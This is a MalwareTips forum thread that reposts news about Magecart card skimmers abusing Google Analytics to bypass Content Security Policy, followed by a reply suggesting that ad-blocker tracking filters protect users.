Hackers use Google Analytics to steal credit cards, bypass CSP

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,057
Hackers are using Google's servers and the Google Analytics platform to steal credit card information submitted by customers of online stores.

A new method to bypass Content Security Policy (CSP) using the Google Analytics API disclosed last week has already been deployed in ongoing Magecart attacks designed to scrape credit card data from several dozen e-commerce sites.

This new tactic takes advantage of the fact that e-commerce web sites using Google's web analytics service for tracking visitors are whitelisting Google Analytics domains in their CSP configuration (a security standard used to block the execution of untrusted code on web apps).

New research from web security companies Sansec and PerimeterX shows that using CSP to prevent credit card skimming attacks is pointless on sites that also deploy Google Analytics (GA) as threat actors can use it to exfiltrate harvested data to their own accounts.
 

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,057
 

SeriousHoax

Level 47
Well-known
Mar 16, 2019
3,630
Adblocker like uBlock Origin's default filters: EasyPrivacy, Peter Lowe’s Ad and tracking server list and Adguard's: Adguard Tracking Protection which blocks "googleanalytics" script or the domain as a whole should keep users safe against this attack.
Edit: I couldn't even comment on this with EasyPrivacy enabled because the title of this post contains the words "Google Analytics" in it 😂
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top